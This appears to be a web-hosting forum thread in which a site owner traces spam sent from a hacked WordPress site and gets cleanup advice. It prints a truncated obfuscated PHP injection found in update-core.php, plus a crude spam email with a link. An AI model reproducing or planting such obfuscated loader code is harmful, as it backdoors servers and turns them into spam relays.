New to the community? Start here

WP site used to send spam, can't find source

Hi,

I have a weird problem. I have a site that is being used as a spam relay and sending spam. I have about 20 sites on one server but this one site appears to be the cause.

I have command line access and can see the logs. I have disabled postfix to stop the spam from being sent. The spam messages are queuing up in the system and can be seen with the ‘mailq’ command.

Here is the list of plugins installed.

All In One WP Security 4.0.3 http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin

BMI BMR calculator 1.3 http://wordpress.org/plugins/bmi-bmr-calculator/

Breadcrumb NavXT 5.3.1 http://mtekk.us/code/breadcrumb-navxt/

CloudFlare 1.3.19 http://www.cloudflare.com/wiki/CloudFlareWordPressPlugin

Admin Columns 2.4.8 http://www.admincolumns.com

Disable Comments 1.3.2 http://wordpress.org/extend/plugins/disable-comments/

Gravity Forms 1.8.19 http://www.gravityforms.com

Jetpack by WordPress.com 3.8.2 http://jetpack.me

WPBakery Visual Composer 4.5.2 http://vc.wpbakery.com

Simple Custom CSS 3.2 http://johnregan3.github.io/simple-custom-css

TemplatesNext ToolKit 1.1.4

UpdraftPlus – Backup/Restore 1.11.20 https://updraftplus.com

Yoast SEO 3.0.7 https://yoast.com/wordpress/plugins/seo/#utm_source=wpadmin&utm_medium=plugin&utm_campaign=wpseoplugin

Also here is a few lines of http-access that are not from my address.

198.71.230.7 - - [03/Jan/2016:22:21:54 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92

93.125.99.4 - - [03/Jan/2016:22:22:41 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92

50.62.208.100 - - [03/Jan/2016:22:24:46 +0000] "POST /wp-admin/update-core.php HTTP/1.1" 200 92

Here is one of the spam emails in the postfix queue:

rewrite_context=localF

[email protected]

To: [email protected]

Subject: 1 New InstaCheat AlertNRX-PHP-Originating-Script: 48:update-core.php(1) : eval()’d code(1) : eval()’d codeN$Date: Sun, 3 Jan 2016 22:33:06 +0000N:From: Wilma Fitzgerald <[email protected]>N?Message-ID: <[email protected]>N

X-Priority: 3NCX-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)N

MIME-Version: 1.0N$Content-Type: multipart/alternative;N/ boundary=”b1_10dd4c7c740c265c75725085ae91aa87″N

Content-Transfer-Encoding: 8bitN

N%–b1_10dd4c7c740c265c75725085ae91aa87N*Content-Type: text/plain; charset=us-asciiN

NDI’m horny as f#ck and looking for something tonight! want to meetup?N

N0i’m not into commitment. i just want a hard f*ckNB[ http://moeller-it-service.de/dirs.php?a=40&3=81YhFdRxWsVt7cza ] N

my profile N

see u soonN

N%–b1_10dd4c7c740c265c75725085ae91aa87N)Content-Type: text/html; charset=us-asciiN

<html>N

<body>N

NDI’m horny as f#ck and looking for something tonight! want to meetup?N

N4i’m not into commitment. i just want a hard f*ckNHN

my profile N

N

N

see u soon N

N

</html>N

</body>N

N’–b1_10dd4c7c740c265c75725085ae91aa87–N

[email protected]

UPDATE: I looked at the update-core.php file and it has a GLOBALS defined in it, whereas no other update-core.php file has it. Could this be the error? How did it get in here?

$GLOBALS['z4c0'];global$z4c0;$z4c0=$GLOBALS;$z4c0['u7a1']="x2bx38x69xax7ex71x39x4dx3ex4ex76x31x2ax48x47x65x26x66x68x29x54x77x4fx20x4cx6bx6ax4bx46x56x24x45x36x2cx32x63x44x51x50x40x5cx72x9x2ex3fx6fx5ax42x7ax3ax21x6ex5ex59x58x55x43x6dx4ax5fx70x78x23x62x53x30x60x41x49x28x61x6cx75x74x22x34x3cx7dx2dx33x79x64x52x25x3dx35x7cx27x5dx57xdx2fx73x37x67x5bx7bx3b";$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][81].$z4c0['u7a1'][75].$z4c0['u7a1'][15]]=$z4c0['u7a1'][35].$z4c0['u7a1'][18].$z4c0['u7a1'][41];$z4c0[$z4c0['u7a1'][15].$z4c0['u7a1'][32].$z4c0['u7a1'][1].$z4c0['u7a1'][70].$z4c0['u7a1'][93].$z4c0['u7a1'][34]]=$z4c0['u7a1'][45].$z4c0['u7a1'][41].$z4c0['u7a1'][81];$z4c0[$z4c0['u7a1'][92].$z4c0['u7a1'][11].$z4c0['u7a1'][93].$z4c0['u7a1'][35].$z4c0['u7a1'][79].$z4c0['u7a1'][6].$z4c0['u7a1'][81].$z4c0['u7a1'][35]]=$z4c0['u7a1'][92].$z4c0['u7a1'][73].$z4c0['u7a1'][41].$z4c0['u7a1'][71].$z4c0['u7a1'][15].$z4c0['u7a1'][51];$z4c0[$z4c0['u7a1'][26].$z4c0['u7a1'][17].$z4c0['u7a1'][11].$z4c0['u7a1'][79].$z4c0['u7a1'][35].$z4c0['u7a1'][63]]=$z4c0['u7a1'][2].$z4c0['u7a1'][51].$z4c0['u7a1'][2].$z4c0['u7a1'][59].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73];$z4c0[$z4c0['u7a1'][51].$z4c0['u7a1'][65].$z4c0['u7a1'][63].$z4c0['u7a1'][15].$z4c0['u7a1'][70].$z4c0['u7a1'][6].$z4c0['u7a1'][85].$z4c0['u7a1'][65]]=$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][2].$z4c0['u7a1'][70].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][48].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][61].$z4c0['u7a1'][85].$z4c0['u7a1'][63].$z4c0['u7a1'][79].$z4c0['u7a1'][15].$z4c0['u7a1'][15].$z4c0['u7a1'][11].$z4c0['u7a1'][35]]=$z4c0['u7a1'][60].$z4c0['u7a1'][18].$z4c0['u7a1'][60].$z4c0['u7a1'][10].$z4c0['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][92].$z4c0['u7a1'][2].$z4c0['u7a1'][45].$z4c0['u7a1'][51];$z4c0[$z4c0['u7a1'][92].$z4c0['u7a1'][17].$z4c0['u7a1'][35].$z4c0['u7a1'][17].$z4c0['u7a1'][79].$z4c0['u7a1'][75].$z4c0['u7a1'][34].$z4c0['u7a1'][79]]=$z4c0['u7a1'][72].$z4c0['u7a1'][51].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][41].$z4c0['u7a1'][2].$z4c0['u7a1'][70].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][48].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][63].$z4c0['u7a1'][32].$z4c0['u7a1'][65].$z4c0['u7a1'][1].$z4c0['u7a1'][79].$z4c0['u7a1'][85].$z4c0['u7a1'][35].$z4c0['u7a1'][17]]=$z4c0['u7a1'][63].$z4c0['u7a1'][70].$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][32].$z4c0['u7a1'][75].$z4c0['u7a1'][59].$z4c0['u7a1'][81].$z4c0['u7a1'][15].$z4c0['u7a1'][35].$z4c0['u7a1'][45].$z4c0['u7a1'][81].$z4c0['u7a1'][15];$z4c0[$z4c0['u7a1'][57].$z4c0['u7a1'][65].$z4c0['u7a1'][35].$z4c0['u7a1'][75]]=$z4c0['u7a1'][92].$z4c0['u7a1'][15].$z4c0['u7a1'][73].$z4c0['u7a1'][59].$z4c0['u7a1'][73].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][15].$z4c0['u7a1'][59].$z4c0['u7a1'][71].$z4c0['u7a1'][2].$z4c0['u7a1'][57].$z4c0['u7a1'][2].$z4c0['u7a1'][73];$z4c0[$z4c0['u7a1'][21].$z4c0['u7a1'][79].$z4c0['u7a1'][85].$z4c0['u7a1'][65].$z4c0['u7a1'][79].$z4c0['u7a1'][34].$z4c0['u7a1'][34].$z4c0['u7a1'][15].$z4c0['u7a1'][32]]=$z4c0['u7a1'][15].$z4c0['u7a1'][75].$z4c0['u7a1'][34].$z4c0['u7a1'][1];$z4c0[$z4c0['u7a1'][35].$z4c0['u7a1'][93].$z4c0['u7a1'][32].$z4c0['u7a1'][6].$z4c0['u7a1'][85]]=$z4c0['u7a1'][72].$z4c0['u7a1'][81].$z4c0['u7a1'][79].$z4c0['u7a1'][63].$z4c0['u7a1'][81].$z4c0['u7a1'][15].$z4c0['u7a1'][93];$z4c0[$z4c0['u7a1'][48].$z4c0['u7a1'][79].$z4c0['u7a1'][32].$z4c0['u7a1'][75].$z4c0['u7a1'][65].$z4c0

Sun, 3 Jan 2016 22:29:03
  • Tyler Postle
    • Recruit

    Hey jpforte,

    That code definitely looks suspcious and if it’s not in the current version update-core.php file that it’s safe to say that it’s not needed as custom changes shouldn’t be made to the core files.

    Here is a guide on how to reinstall your WP version after a hack: http://www.inmotionhosting.com/support/website/wordpress/reinstall-wordpress-after-a-hack

    That should make sure your files are clean. Make sure you do a scan as well, you can actually contact your web host and they’ll often do this for you. It’s always safe to do one yourself too.

    Could this be the error? How did it get in here?

    I’m not very knowledgeable when it comes to hacking; however, it’s possible someone got a hold of your FTP info and uploaded it that way or really any type of access to your files. So I would recommend changing your cPanel, FTP, and wp-admin passwords.

    Hope that helps! Let us know if you’re still seeing issues after re-installing and cleaning up your install.

    Cheers,

    Tyler